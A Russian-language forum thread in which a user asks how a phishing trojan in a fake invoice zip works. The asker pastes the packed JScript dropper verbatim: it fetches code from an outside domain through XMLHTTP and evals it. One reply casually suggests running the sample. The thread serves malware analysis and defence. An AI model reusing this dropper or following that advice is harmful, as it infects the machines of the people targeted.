Какую уязвимость использует этот троян?

Question

[DanXai]

Доброго времени суток! На корпоративную почту пришел очередной троян с таким содержанием письма:

День добрый. Сообщаем о том, что вы не заплатили всю сумму за оказанные услуги (см. отчеты во вложении). Просьба провести расчет до пятницы, иначе автоматически начнет начисляться пеня. Если возникли вопросы по прикрепленным документам, ждем обратной связи.

Внутри -- файл с именем "Реквизиты_для_расчета(услуги) рdf.zip"
Если открыть файл в текстовом редакторе, то видна сигнатура заголовка PK, потом идет некий JS-код:
/// 44bd2d8b8809da6d917416e1ff6cd9ab
/// 4754ac4cfd566dd8a504bbe8a0cded41
eval(function(c,e,a,b,d,f){d=function(a){return a.toString(36)};if(!"".replace(/^/,String)){for(;a--;)f[a.toString(e)]=b[a]||a.toString(e);b=[function(a){return f[a]}];d=function(){return"\\w+"};a=1}for(;a--;)b[a]&&(c=c.replace(new RegExp("\\b"+d(a)+"\\b","g"),b[a]));return c}('d 5=["e.f","c","b://7.9","8","g"],a=i h(5[0]);a[5[3]](5[1],5[2],0);a[5[4]]();a[5[3]](5[1],a.6,0);a[5[4]]();j(a.6);',20,20," _0xc332 ResponseText flexured open com http GET var MSXML2 XMLHTTP send ActiveXObject new eval".split(" "),
/// a34b1357c2cf94df8166efc8393669d3
/// 937512e44a4023a51be3472c93e14b06
/// a562cf96b2a9fdc3ae1ab0f5abd09baf
/// 70528b780de8760978cfb3cb56025709
/// 48767e01b9f7766c7536f4261d5effad
/// 7cfe91ef2168145f28bbbfe5df31110d
0,{}));

Ссылка на вирустотале:
https://www.virustotal.com/ru/file/7b66c3ad45b5394...
Вирустотал выдал еще такую инфу:
ZipFileName: ??? ?????? - ?????? - ?? ?? 27-?? ???? 2016?. ??? ?? ? ????? ??????? ?? ???? ? ???????.??? ?? ? ???? ????.bb6ebce_txt_.js
Сам троян отправил в базу Касперского.

Такой вопрос -- а как собственно он работает? Как запускается JS-скрипт? Открыл файл в виртуалке встроенным виндовым архиватором -- система выдала, что файл поврежден.

Comments

[Алексей]

Очевидно скачивает файл с вирусом и запускает его.

Answer 1

[#алгоптимизируй #отботизируй]

Ну так может он и поврежден.
Вроде бы делается куда-то запрос, дальше возможно исполнение кода, полученного удаленно.
Разбираться лень.
Сохраните чистый код в файле с расширением .js и попробуйте запустить =)

Comments

[DanXai]

Ну с функционалом дело понятное -- скачивается основное тело, дальше запускается и делает свое грязное дело. Непонятно другое -- даже если архив был бы неповрежден -- как запускается скрипт внутри него? Имел бы файл имя Блаблабла.zip.js или если бы внутри архива был бы файл Блаблабла.js -- другое дело, такие сразу отсекаются. А тут я даже не знаю, как ловить такое -- внешне файл вполне невинный, подозрительным было само письмо, без имен, контактов и прочее.

[#алгоптимизируй #отботизируй]

Я так понимаю, что внутри зипа запакован js без сжатия, другое дело,что родной архиватор этого не видит.

[DanXai]

С Sharp: Спасибо за наводку. Распаковал через 7zip -- действительно, внутри виден скрипт, правда с абракадаброй в имени. Пойду займусь запретом запуска скриптов.

Answer 2

[Rou1997]

Никакую, в браузере он не работает, просто рассчитан на запуск пользователем.